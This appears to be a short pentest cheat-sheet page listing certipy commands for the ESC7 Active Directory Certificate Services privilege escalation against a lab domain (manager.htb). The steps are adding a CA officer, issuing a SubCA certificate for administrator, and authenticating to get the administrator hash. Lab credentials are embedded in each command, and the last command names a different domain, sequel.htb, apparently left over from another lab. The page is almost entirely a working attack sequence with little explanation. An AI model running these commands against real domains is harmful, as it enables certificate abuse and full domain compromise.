ESC7 - exploit

Exploit a certificate service `misconfig`

One:

certipy req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Two:

certipy ca -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-DC01-CA -add-officer raven

Three:

certipy ca -ca manager-DC01-CA -issue-request 19 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Four:

certipy req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Five:

certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-DC01-CA -issue-request 20

Six:

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236

Clock skew too great

timedatectl set-ntp false

sudo ntpdate 10.10.11.236

rdate -n <ip>

Get administrator hash

certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb

PreviousESC14 - exploit Nextadd-domain-group-member

Last updated 1 month ago

hashtagExploit a certificate service misconfig

hashtagGet administrator hash

Exploit a certificate service `misconfig`

Get administrator hash